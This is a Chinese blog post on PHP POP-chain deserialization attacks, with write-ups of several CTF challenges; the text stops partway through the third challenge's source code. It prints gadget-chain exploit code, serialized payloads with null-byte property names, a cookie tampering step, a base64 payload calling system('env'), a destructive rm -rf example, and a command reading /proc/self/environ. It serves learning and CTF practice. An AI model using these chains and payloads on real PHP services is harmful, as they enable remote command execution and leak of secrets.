
  <!DOCTYPE html>
  <html lang="en"  >
  <head>
  <meta charset="utf-8">
  

  

  

  
  <script>window.icon_font = '4552607_tq6stt6tcg';window.clipboard_tips = {"success":"复制成功(*^▽^*)","fail":"复制失败 (ﾟ⊿ﾟ)ﾂ","copyright":{"enable":false,"count":50,"content":"本文版权：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！"}};</script>
  
  
  <title>
    关于pop链的深入研究 |
    
    Flight-star&#39;blog
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_tq6stt6tcg.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
    
<link rel="stylesheet" href="/css/loader.css">

  
  
    <meta name="description" content="关于POP链 (Property Oriented Programming Chain）：pop链漏洞通常是在用在有反序列化的程序当中，由于运用了大量的魔术方程，所以可能会出现一些纰漏，导致存在原生函数或者是更加明显的执行函数的被利用。（RCE，数据泄漏等等） 关于原生函数：常见的原生函数：1&#96;array_walk()&#96;、&#96;system()&#96;、&#96;eval()&#96;、&#96;unserialize()、exe">
<meta property="og:type" content="article">
<meta property="og:title" content="关于pop链的深入研究">
<meta property="og:url" content="http://example.com/2025/03/11/%E5%85%B3%E4%BA%8Epop%E9%93%BE%E7%9A%84%E6%B7%B1%E5%85%A5%E7%A0%94%E7%A9%B6/index.html">
<meta property="og:site_name" content="Flight-star&#39;blog">
<meta property="og:description" content="关于POP链 (Property Oriented Programming Chain）：pop链漏洞通常是在用在有反序列化的程序当中，由于运用了大量的魔术方程，所以可能会出现一些纰漏，导致存在原生函数或者是更加明显的执行函数的被利用。（RCE，数据泄漏等等） 关于原生函数：常见的原生函数：1&#96;array_walk()&#96;、&#96;system()&#96;、&#96;eval()&#96;、&#96;unserialize()、exe">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/image-20250315090053604-1742000457665-1.png">
<meta property="og:image" content="http://example.com/images/image-20250315090308935-1742000590350-3.png">
<meta property="article:published_time" content="2025-03-11T11:53:27.000Z">
<meta property="article:modified_time" content="2025-03-15T04:22:00.244Z">
<meta property="article:author" content="Flight-star">
<meta property="article:tag" content="pop链">
<meta property="article:tag" content="网安">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/image-20250315090053604-1742000457665-1.png">
  
  
    <link rel="alternate" href="/atom.xml" title="Flight-star'blog" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
  
  
  
  
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js"></script>

  
  
    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.0.1/dist/aos.css">

  
<meta name="generator" content="Hexo 7.3.0"></head>

  <body>
    
  <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi">
        <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
          <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="#ff5252" />
          <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
         M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="#ff5252" />
        </svg>
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var startLoading = () => {
      time = Date.now();
      document.getElementById('loader').classList.remove("loading");
    }
    var endLoading = () => {
      if (!time) {
        document.body.style.overflow = 'auto';
        document.getElementById('loader').classList.add("loading");
      } else {
        if (Date.now() - time > 500) {
          time = null;
          document.body.style.overflow = 'auto';
          document.getElementById('loader').classList.add("loading");
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    document.getElementById('loader').addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip" style="pointer-events: none; opacity: 0; transition: all 0.2s ease; position: fixed;top: 50%;left: 50%;z-index: 999;transform: translate(-50%, -50%);color: white;background: rgba(0, 0, 0, 0.5);padding: 10px 15px;border-radius: 10px;">
</div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav">
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/">Home</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/archives">Archives</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/about">About</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/friend">Friend</a>
      </span>
    
    <a id="main-nav-toggle" class="nav-icon"></a>
  </nav>
  <nav id="sub-nav">
    
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed" target="_blank"></a>
    
    
    
  </nav>
</div>
<header id="header">
  
    
      <img fetchpriority="high" src="/images/banner.webp" alt="关于pop链的深入研究">
    
  
  <div id="header-outer">
    <div id="header-title">
      
        
        
          <a href="/" id="logo">
            <h1 data-aos="slide-up">关于pop链的深入研究</h1>
          </a>
        
      
      
        
        <h2 id="subtitle-wrap" data-aos="slide-down">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content">
          
          <section id="main"><article id="post-关于pop链的深入研究" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <a href="/2025/03/11/%E5%85%B3%E4%BA%8Epop%E9%93%BE%E7%9A%84%E6%B7%B1%E5%85%A5%E7%A0%94%E7%A9%B6/" class="article-date-link" data-aos="zoom-in">
    <time datetime="2025-03-11T11:53:27.000Z" itemprop="datePublished">2025-03-11</time>
    <time style="display: none;" id="post-update-time">2025-03-15</time>
  </a>
</div>

      

    </div>
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
      
        <h1 id="关于POP链-Property-Oriented-Programming-Chain）："><a href="#关于POP链-Property-Oriented-Programming-Chain）：" class="headerlink" title="关于POP链 (Property Oriented Programming Chain）："></a>关于POP链 (Property Oriented Programming Chain）：</h1><p>pop链漏洞通常是在用在有反序列化的程序当中，由于运用了大量的魔术方程，所以可能会出现一些纰漏，导致存在原生函数或者是更加明显的执行函数的被利用。（RCE，数据泄漏等等）</p>
<h2 id="关于原生函数："><a href="#关于原生函数：" class="headerlink" title="关于原生函数："></a>关于原生函数：</h2><h3 id="常见的原生函数："><a href="#常见的原生函数：" class="headerlink" title="常见的原生函数："></a>常见的原生函数：</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">`array_walk()`、`system()`、`eval()`、`unserialize()、exec()等</span><br></pre></td></tr></table></figure>

<h3 id="怎么利用原生函数？："><a href="#怎么利用原生函数？：" class="headerlink" title="怎么利用原生函数？："></a>怎么利用原生函数？：</h3><p>system，eval，exec这几个可以直接或者半直接执行函数的就不仔细说了，为什么array_walk也会被利用呢？</p>
<h4 id="array-walk："><a href="#array-walk：" class="headerlink" title="array_walk："></a>array_walk：</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">array_walk</span>(<span class="keyword">array</span> &amp;<span class="variable">$array</span>, <span class="keyword">callable</span> <span class="variable">$callback</span>, <span class="keyword">mixed</span> <span class="variable">$userdata</span> = <span class="literal">null</span>): <span class="keyword">bool</span></span><br><span class="line">    </span><br><span class="line">实际例子：<span class="title function_ invoke__">array_walk</span>(<span class="variable">$this</span>, function (<span class="variable">$day1</span>, <span class="variable">$day2</span>) &#123;</span><br><span class="line">                <span class="variable">$day3</span> = <span class="keyword">new</span> <span class="variable">$day2</span>(<span class="variable">$day1</span>);</span><br><span class="line">                <span class="keyword">foreach</span> (<span class="variable">$day3</span> <span class="keyword">as</span> <span class="variable">$day4</span>) &#123;</span><br><span class="line">                    <span class="keyword">echo</span> (<span class="variable">$day4</span> . <span class="string">&#x27;&lt;br&gt;&#x27;</span>);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;);</span><br></pre></td></tr></table></figure>

<ul>
<li><p><code>$array</code>：要遍历的数组。（<strong>会把这个数组里面的值逐一赋值给回调函数 {也可以是匿名函数}</strong> ）</p>
</li>
<li><p><code>$callback</code>：回调函数，该函数至少接受两个参数，<strong>第一个参数是数组元素的值</strong>，<strong>第二个参数是数组元素的键</strong>。</p>
</li>
<li><p><code>$userdata</code>：可选参数，传递给回调函数的额外数据。</p>
<p>（键：相当于 <strong>array [ 键 ]</strong>,这里面的<strong>数字就是键</strong>）</p>
<hr>
</li>
<li><p>特殊情况：$this——$this***<code>对象的属性值会赋值给</code>$day1<strong><em><strong>，</strong></em><code>属性名会赋值给 </code>$day2</strong>*</p>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class MaliciousClass &#123;</span><br><span class="line">    public function __construct() &#123;</span><br><span class="line">        // 执行系统命令，如删除文件</span><br><span class="line">        system(&#x27;rm -rf /tmp/sensitive_folder&#x27;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class MyClass &#123;</span><br><span class="line">    public $userInput;</span><br><span class="line"></span><br><span class="line">    public function process() &#123;</span><br><span class="line">        array_walk($this, function ($day1, $day2) &#123;</span><br><span class="line">            $day3 = new $day2($day1);</span><br><span class="line">            foreach ($day3 as $day4) &#123;</span><br><span class="line">                echo ($day4 . &#x27;&lt;br&gt;&#x27;);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">// 攻击者控制 $userInput 的值</span><br><span class="line">$obj = new MyClass();</span><br><span class="line">$obj-&gt;userInput = &#x27;MaliciousClass&#x27;;</span><br><span class="line">$obj-&gt;process();</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>在这个代码里，$callback （回调函数） 变成结合了匿名函数来执行代码</p>
<ul>
<li>攻击者将 <code>MyClass</code> 对象的 <code>$userInput</code> 属性值设置为 <code>MaliciousClass</code>。</li>
<li>当调用 <code>$obj-&gt;process()</code> 方法时，<code>array_walk</code> 会遍历 <code>$this</code> 对象的属性，将属性名 <code>userInput</code> 作为类名，属性值 <code>MaliciousClass</code> 传递给 <code>new</code> 关键字，从而实例化 <code>MaliciousClass</code> 对象。</li>
<li>实例化 <code>MaliciousClass</code> 对象时，其构造函数被自动调用，构造函数中的 <code>system</code> 函数执行危险的系统命令，最终导致服务器上的敏感目录被删除。</li>
</ul>
<h5 id="匿名函数："><a href="#匿名函数：" class="headerlink" title="匿名函数："></a>匿名函数：</h5><p>在我认知里，相当于一个临时数组，里面可以至多存放两个变量，对变量的操作可以直接视为函数操作：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$numbers = [1, 2, 3];</span><br><span class="line">array_walk($numbers, function($value) &#123;</span><br><span class="line">    echo $value * 2 . &#x27; &#x27;;</span><br><span class="line">&#125;);</span><br><span class="line">// 输出：2 4 6</span><br></pre></td></tr></table></figure>

<p>函数体 <strong><code>echo $value * 2 . &#39; &#39;;</code></strong> 的作用是将当前元素的值乘以 <code>2</code>，然后将结果输出，并在后面添加一个空格</p>
<p>这大概就是关于array__walk的大概解释了</p>
<p><em><strong>总结：</strong></em>   <strong>就是给它数组或者属性，会遍历数组将值赋值给匿名函数，然后利用匿名函数来执行非法操作</strong></p>
<h1 id><a href="#" class="headerlink" title></a></h1><h3 id="在仔细理解后便去先做了点简单的题目：-SWPUCTF-2021-新生赛-pop"><a href="#在仔细理解后便去先做了点简单的题目：-SWPUCTF-2021-新生赛-pop" class="headerlink" title="在仔细理解后便去先做了点简单的题目：[SWPUCTF 2021 新生赛]pop"></a>在仔细理解后便去先做了点简单的题目：[SWPUCTF 2021 新生赛]pop</h3><p>源码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line"></span><br><span class="line">error_reporting(0);</span><br><span class="line">show_source(&quot;index.php&quot;);</span><br><span class="line"></span><br><span class="line">class w44m&#123;</span><br><span class="line"></span><br><span class="line">    private $admin = &#x27;aaa&#x27;;</span><br><span class="line">    protected $passwd = &#x27;123456&#x27;;</span><br><span class="line"></span><br><span class="line">    public function Getflag()&#123;</span><br><span class="line">        if($this-&gt;admin === &#x27;w44m&#x27; &amp;&amp; $this-&gt;passwd ===&#x27;08067&#x27;)&#123;</span><br><span class="line">            include(&#x27;flag.php&#x27;);</span><br><span class="line">            echo $flag;</span><br><span class="line">        &#125;else&#123;</span><br><span class="line">            echo $this-&gt;admin;</span><br><span class="line">            echo $this-&gt;passwd;</span><br><span class="line">            echo &#x27;nono&#x27;;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class w22m&#123;</span><br><span class="line">    public $w00m;</span><br><span class="line">    public function __destruct()&#123;</span><br><span class="line">        echo $this-&gt;w00m;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class w33m&#123;</span><br><span class="line">    public $w00m;</span><br><span class="line">    public $w22m;</span><br><span class="line">    public function __toString()&#123;</span><br><span class="line">        $this-&gt;w00m-&gt;&#123;$this-&gt;w22m&#125;();</span><br><span class="line">        return 0;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$w00m = $_GET[&#x27;w00m&#x27;];</span><br><span class="line">unserialize($w00m);</span><br><span class="line"></span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>

<p>思路：{ destruct() }—–&gt;  { toString() }—–&gt;w44m</p>
<p>于是构建：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">class w44m&#123;</span><br><span class="line">    private $admin = &#x27;w44m&#x27;;</span><br><span class="line">    protected $passwd = &#x27;08067&#x27;;</span><br><span class="line"></span><br><span class="line">    public function Getflag()&#123;</span><br><span class="line">        if($this-&gt;admin === &#x27;w44m&#x27; &amp;&amp; $this-&gt;passwd ===&#x27;08067&#x27;)&#123;</span><br><span class="line">            include(&#x27;flag.php&#x27;);</span><br><span class="line">            echo $flag;</span><br><span class="line">        &#125;else&#123;</span><br><span class="line">            echo $this-&gt;admin;</span><br><span class="line">            echo $this-&gt;passwd;</span><br><span class="line">            echo &#x27;nono&#x27;;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class w22m&#123;</span><br><span class="line">    public $w00m;</span><br><span class="line">    public function __destruct()&#123;</span><br><span class="line">        echo $this-&gt;w00m;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class w33m&#123;</span><br><span class="line">    public $w00m;</span><br><span class="line">    public $w22m;</span><br><span class="line">    public function __toString()&#123;</span><br><span class="line">        $this-&gt;w00m-&gt;&#123;$this-&gt;w22m&#125;();</span><br><span class="line">        return &#x27;0&#x27;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$a = new w22m();</span><br><span class="line">$a-&gt;w00m = new w33m();</span><br><span class="line">$b = $a-&gt;w00m;</span><br><span class="line">$b-&gt;w00m = new w44m();</span><br><span class="line">$b-&gt;w22m = &#x27;Getflag&#x27;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">echo serialize($a);</span><br></pre></td></tr></table></figure>



<p>后面发现好像不需要构造这么长（恼</p>
<p>输出得到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:4:&quot;w22m&quot;:1:&#123;s:4:&quot;w00m&quot;;O:4:&quot;w33m&quot;:2:&#123;s:4:&quot;w00m&quot;;O:4:&quot;w44m&quot;:2:&#123;s:11:&quot;w44madmin&quot;;s:4:&quot;w44m&quot;;s:9:&quot;*passwd&quot;;s:5:&quot;08067&quot;;&#125;s:4:&quot;w22m&quot;;s:7:&quot;Getflag&quot;;&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>记得把保护属性和私有属性加上：（**%00把空字符替换**）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:4:&quot;w22m&quot;:1:&#123;s:4:&quot;w00m&quot;;O:4:&quot;w33m&quot;:2:&#123;s:4:&quot;w00m&quot;;O:4:&quot;w44m&quot;:2:&#123;s:11:&quot;%00w44m%00admin&quot;;s:4:&quot;w44m&quot;;s:9:&quot;%00*%00passwd&quot;;s:5:&quot;08067&quot;;&#125;s:4:&quot;w22m&quot;;s:7:&quot;Getflag&quot;;&#125;&#125;</span><br></pre></td></tr></table></figure>



<p>即可做出</p>
<h4 id="HZNUCTF-2023-preliminary-ppppop"><a href="#HZNUCTF-2023-preliminary-ppppop" class="headerlink" title="[HZNUCTF 2023 preliminary]ppppop"></a>[HZNUCTF 2023 preliminary]ppppop</h4><p>进入页面，一片空白？</p>
<p><img src="/../images/image-20250315090053604-1742000457665-1.png" alt="image-20250315090053604"></p>
<p>我该怎么做？很迷茫，扫描了发现也什么都没有，只好去看了一下别人的blog，发现需要抓包：</p>
<p><img src="/../images/image-20250315090308935-1742000590350-3.png" alt="image-20250315090308935"></p>
<p>发现cookie值是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:4:&quot;User&quot;:1:&#123;s:7:&quot;isAdmin&quot;;b:0;&#125;------base64解编码后</span><br></pre></td></tr></table></figure>

<p>我们修改0为1</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:4:&quot;User&quot;:1:&#123;s:7:&quot;isAdmin&quot;;b:1;&#125;</span><br></pre></td></tr></table></figure>

<p>得到源码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);关闭 PHP 的错误报告。</span><br><span class="line">include(&#x27;utils.php&#x27;);包含名为 utils.php 的文件。</span><br><span class="line"></span><br><span class="line">class A &#123;</span><br><span class="line">    public $className;用于存储一个类名</span><br><span class="line">    public $funcName;用于存储一个方法名</span><br><span class="line">    public $args;用于存储传递给方法的参数。</span><br><span class="line"></span><br><span class="line">    public function __destruct() &#123;   这是 PHP </span><br><span class="line">    的析构函数，当对象被销毁时自动调用</span><br><span class="line">        $class = new $this-&gt;className; 根据存储的</span><br><span class="line">         className 创建一个新的对象 $class。</span><br><span class="line">        $funcName = $this-&gt;funcName;将存储的</span><br><span class="line">         funcName 赋值给变量 $funcName。</span><br><span class="line">        $class-&gt;$funcName($this-&gt;args);</span><br><span class="line">        调用新创建对象的指定方法，并传入存储的参数。</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class B &#123;</span><br><span class="line">    public function __call($func, $arg) &#123;  这是</span><br><span class="line">     PHP 的魔术方法，当调用一个不可访问的方法时自动触发。</span><br><span class="line">        $func($arg[0]);</span><br><span class="line">    &#125;在这个方法中，它将第一个参数 $arg[0]（即传入的参</span><br><span class="line">    数数组中的第一个元素）作为参数传递给存储在变量 $func</span><br><span class="line">     中的函数进行调用。</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if(checkUser()) &#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">    $payload = strrev(base64_decode($_POST[&#x27;payload&#x27;]));</span><br><span class="line">    从用户提交的 POST 请求中获取 payload 参数 ，对其进行</span><br><span class="line">     base64 解码，然后将结果反转。</span><br><span class="line">    unserialize($payload);</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p><strong>错误点：</strong>我<strong>误把值直接赋值给了<code>$func</code>和 <code>$arg</code>导致错误</strong>了，应该直接赋值给</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">public  $className;</span><br><span class="line">public $funcName;</span><br><span class="line">public $args;</span><br></pre></td></tr></table></figure>



<p>答案是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">class A &#123;</span><br><span class="line">    public $className = &quot;B&quot;;</span><br><span class="line">    public $funcName = &quot;system&quot;;</span><br><span class="line">    public $args = &quot;env&quot;;--------------除了环境变量还有ls -a（列出所有的目录与名字）</span><br><span class="line">                                       cat /proc/self/environ（也是读取环境变量）</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class B &#123;</span><br><span class="line">    public function __call($func, $arg) &#123;</span><br><span class="line">        $func($arg[0]); // $func 是方法名，$arg 是调用时的参数数组</span><br><span class="line">    &#125;</span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line">$d = new A();</span><br><span class="line"></span><br><span class="line">$f = serialize($d);      // 序列化</span><br><span class="line">$g = strrev($f);        // 反转字符串</span><br><span class="line">echo base64_encode($g);  // Base64 编码</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">fTsidm5lIjozOnM7InNncmEiOjQ6czsibWV0c3lzIjo2OnM7ImVtYU5jbnVmIjo4OnM7IkIiOjE6czsiZW1hTnNzYWxjIjo5OnN7OjM6IkEiOjE6Tw==</span><br></pre></td></tr></table></figure>



<h4 id="网鼎杯-2020-青龙组-AreUSerialz（其实这个本来应该放在第一个的，忘记写了）"><a href="#网鼎杯-2020-青龙组-AreUSerialz（其实这个本来应该放在第一个的，忘记写了）" class="headerlink" title="[网鼎杯 2020 青龙组]AreUSerialz（其实这个本来应该放在第一个的，忘记写了）"></a>[网鼎杯 2020 青龙组]AreUSerialz（其实这个本来应该放在第一个的，忘记写了）</h4><p>ez_反序列化漏洞）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">include(&quot;flag.php&quot;);</span><br><span class="line"></span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line">class FileHandler &#123;</span><br><span class="line"></span><br><span class="line">    protected $op;</span><br><span class="line">    protected $filename;</span><br><span class="line">    protected $content;</span><br><span class="line"></span><br><span class="line">    function __construct() &#123;</span><br><span class="line">        $op = &quot;1&quot;;</span><br><span class="line">        $filename = 